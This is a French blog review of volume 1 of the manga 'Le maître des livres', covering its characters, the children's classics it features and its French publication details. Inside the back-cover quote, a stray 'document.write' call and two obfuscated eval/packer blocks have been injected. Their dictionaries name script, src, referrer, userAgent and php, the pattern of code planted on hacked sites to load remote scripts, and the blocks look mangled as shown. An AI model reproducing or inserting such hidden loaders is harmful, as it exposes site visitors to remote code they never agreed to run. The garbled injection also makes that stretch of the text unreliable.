Le maître des livres (1)

“À la bibliothèque pour enfant “La rose trémière” vous êtes accueillis et conseillés par Mikoshiba, document.write(“”); un bibliothécaire binoclard célèbre pour son caractère bien trempé. Mais contrairement à ce qu’il peut laisser paraître, c’est un professionnel de premier ordre. Aujourd’hui encore, adultes comme enfants perdus dans leur vie viennent à lui en espérant qu’il leur trouvera le livre salvateur.”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffdbk|var|u0026u|referrer|taarh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzrzf|var|u0026u|referrer|nahbe||js|php’.split(‘|’),0,{}))

“Une histoire passionnante centrée sur la littérature et Mikoshiba, le “sommelier du livre pour enfant”.”

(Texte de la couverture arrière)

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

Le maître des livres (????? / Toshokan no Aruji / lit. “Le seigneur de la bibliothèque”) est un manga seinen par Umiharu Shinohara qui est couramment prépublié en feuilletons dans la magazine Weekly Manga Times de l’éditeur japonais H?bunsha. Compilé en volumes (tank?bon) depuis août 2011, il y a neuf tomes de parus au Japon jusqu’à maintenant (le plus récent à la mi-novembre 2014). Publié en français par Komikku Éditions, le deux premiers volumes sont paru simultanément en août 2014, un troisième en début décembre et un quatrième devrait paraître vers la mi-mars 2015. Vous pouvez consultez un extrait d’une quarantaine de pages du premier volume.

J’ai découvert Le maître des livres il y a un peu plus de deux mois et, si je vous l’ai introduit rapidement, je n’ai cependant pas pu le lire tout de suite. Toutefois cela en valait la peine car c’est un très bon manga sur deux sujets que j’aime bien: les mangas et les bibliothèques. L’histoire tourne autour de deux personnages principaux. Le premier est M. Miyamoto, gestionnaire dans une petite entreprise, qui est dans une mauvaise passe: il s’ennui, boit beaucoup, a des dettes des jeux et cherche encore un sens à sa vie. Un soir, après avoir divertis des clients à la fête de fin de l’année de son entreprise, il rentre chez lui un peu saoul en passant par un parc et remarque une petite bibliothèque pour enfant, “la rose trémière.” Il y fait la rencontre de Mikoshiba Takao, le second personnage d’importance, un bibliothécaire d’un caractère direct et acerbe mais qui a un grand talent pour proposer aux gens des livres qui les touchent et qui les guident dans leur problèmes.

Le premier volume nous introduit à l’univers du maître des livres, en présentant tous les personnages secondaires — tel que les employés et les usagers de la bibliothèque — et en nous faisant découvrir peu à peu la personnalité et le passé tant de Miyamoto que de Mikoshiba. À chaque nouveau chapitre la bibliothèque fait découvrir des livres à un usager en détresse. Et si la lecture se révèle salvatrice pour le personnage, elle fait aussi découvrir au lecteur du manga un nouveau titre de la littérature juvénile. En fait, ce manga nous fait réaliser que les livres pour enfants peuvent être une source d’émerveillement non seulement pour les jeunes mais aussi beaucoup pour les adultes. Ainsi, à travers le récit, nous découvrons le conte “La montre musicale” de Nankichi Niimi, L’île au trésor de Robert Louis Stevenson, Le prince heureux de Oscar Wilde, Le merveilleux voyage de Nils Holgersson à travers la Suède de Selma Lagerlöf et la série de romans du “Club des jeunes détectives” de Rampo Edogawa.

C’est donc un manga amusant, bien écrit et plutôt éducatif qui nous fait découvrir — ou re-découvrir — l’univers de la littérature jeunesse classique. À lire absolument!

Le maître des livres vol. 1, écrit et illustré par Umiharu Shinohara. Paris, Komikku Éditions, août 2014. 192 pages, 13×18 cm, 8,50 € / $14.95 Cnd, ISBN 9791091610629. Lectorat de 14 ans et plus.

Pour plus d’information vous pouvez aussi consulter les sites suivants:

Toshokan no Aruji © 2012 Umiharu Shinohara • H?bunsha. All rights reserved.

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s